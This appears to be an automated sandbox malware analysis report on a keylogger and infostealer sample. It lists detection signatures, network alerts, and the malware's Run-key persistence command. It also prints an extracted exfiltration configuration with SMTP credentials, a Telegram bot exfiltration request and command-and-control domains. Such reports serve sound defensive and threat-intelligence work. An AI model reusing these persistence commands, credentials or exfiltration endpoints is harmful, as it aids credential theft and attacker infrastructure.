17.2.AddInProcess32.exe.2cb0000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f92:$s1: UnHook 0x33f2e:$s2: SetHook 0x33f67:$s3: CallNextHook 0x33ef6:$s4: _hook
17.2.AddInProcess32.exe.2cb0000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.AddInProcess32.exe.2cb0000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.AddInProcess32.exe.2cb0000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.AddInProcess32.exe.2cb0000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x345ea:$a1: get_encryptedPassword 0x345be:$a2: get_encryptedUsername 0x34682:$a3: get_timePasswordChanged 0x3459a:$a4: get_passwordField 0x34600:$a5: set_encryptedPassword 0x343cd:$a7: get_logins 0x2fc21:$a10: KeyLoggerEventArgs 0x2fbf0:$a11: KeyLoggerEventArgsEventHandler 0x344a1:$a13: _encryptedPassword
17.2.AddInProcess32.exe.2cb0000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e300:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d9a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc00:$a4: \Orbitum\User Data\Default\Login Data 0x3e5df:$a5: \Kometa\User Data\Default\Login Data
17.2.AddInProcess32.exe.2cb0000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32192:$s1: UnHook 0x3212e:$s2: SetHook 0x32167:$s3: CallNextHook 0x320f6:$s4: _hook
17.2.AddInProcess32.exe.2cb0f20.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.AddInProcess32.exe.2cb0f20.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.AddInProcess32.exe.2cb0f20.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.AddInProcess32.exe.2cb0f20.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x338ca:$a1: get_encryptedPassword 0x3389e:$a2: get_encryptedUsername 0x33962:$a3: get_timePasswordChanged 0x3387a:$a4: get_passwordField 0x338e0:$a5: set_encryptedPassword 0x336ad:$a7: get_logins 0x2ef01:$a10: KeyLoggerEventArgs 0x2eed0:$a11: KeyLoggerEventArgsEventHandler 0x33781:$a13: _encryptedPassword
17.2.AddInProcess32.exe.2cb0f20.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc83:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cee0:$a4: \Orbitum\User Data\Default\Login Data 0x3d8bf:$a5: \Kometa\User Data\Default\Login Data
17.2.AddInProcess32.exe.2cb0f20.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31472:$s1: UnHook 0x3140e:$s2: SetHook 0x31447:$s3: CallNextHook 0x313d6:$s4: _hook
0.2.File.com.exe.5ce0000.7.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.449537a.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.449537a.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50066:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33036:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336b6:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x660d6:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d40:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51986:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e3e:$s6: constructor or from DllMain.
16.2.xxlooa.exe.44c8330.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.44c8330.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x33120:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.File.com.exe.3eaecf0.4.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3cf9918.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3cf9918.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.File.com.exe.3cc6962.6.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3cc6962.6.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50066:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33036:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336b6:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d40:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51986:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e3e:$s6: constructor or from DllMain.
Click to see the 86 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\xxlooa.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xxlooa

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7512, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe", ProcessId: 7944, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\File.com.exe", ParentImage: C:\Users\user\Desktop\File.com.exe, ParentProcessId: 7328, ParentProcessName: File.com.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe", ProcessId: 7512, ProcessName: cmd.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.230.212.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Initiated: true, ProcessId: 6936, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49772

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-18T21:25:33.610271+0200
SID:	2803305
Severity:	3
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-18T21:25:45.404634+0200
SID:	2803305
Severity:	3
Source Port:	49759
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-18T21:25:51.015957+0200
SID:	2803305
Severity:	3
Source Port:	49768
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-18T21:25:37.507892+0200
SID:	2803305
Severity:	3
Source Port:	49748
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-08-18T21:25:44.842144+0200
SID:	2803274
Severity:	2
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-18T21:25:46.914683+0200
SID:	2803305
Severity:	3
Source Port:	49763
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-08-18T21:25:43.607796+0200
SID:	2803274
Severity:	2
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-08-18T21:25:46.263935+0200
SID:	2803274
Severity:	2
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-08-18T21:25:34.467074+0200
SID:	2803274
Severity:	2
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-08-18T21:25:33.045166+0200
SID:	2803274
Severity:	2
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-08-18T21:25:29.935791+0200
SID:	2803274
Severity:	2
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-18T21:25:35.046058+0200
SID:	2803305
Severity:	3
Source Port:	49746
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-18T21:25:46.902548+0200
SID:	2803305
Severity:	3
Source Port:	49762
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\xxlooa.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Virustotal: Detection: 49%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\xxlooa.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: File.com.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: File.com.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2

Source: File.com.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: _.pdb source: AddInProcess32.exe, 00000011.00000002.2941974221.0000000002BA5000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.00000000028A8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0108FB20h	17_2_0108F983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0108FB20h	17_2_0108FB6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0108FB20h	17_2_0108FBE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0260FB20h	19_2_0260FB6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0260FB20h	19_2_0260FBE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0260FB20h	19_2_0260F965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 05690F50h	19_2_05690D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 056918DAh	19_2_05690D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569F004h	19_2_0569ED58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569EBACh	19_2_0569E900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 056931BEh	19_2_05692DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569F45Ch	19_2_0569F1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 056931BEh	19_2_05692D96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569E2FCh	19_2_0569E050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 056931BEh	19_2_056930EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569E754h	19_2_0569E4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569D5F4h	19_2_0569D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569DEA4h	19_2_0569DBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 05692A74h	19_2_056927C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569DA4Ch	19_2_0569D7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569FD0Ch	19_2_0569FA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569F8B4h	19_2_0569F608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 0569D19Ch	19_2_0569CEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	19_2_05690280

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 17

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49772 -> 185.230.212.164:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2008:15:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2007:07:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: COMPUTERLINEComputerlineSchlierbachSwitzerlandCH COMPUTERLINEComputerlineSchlierbachSwitzerlandCH

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49761 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 188.114.97.3:443
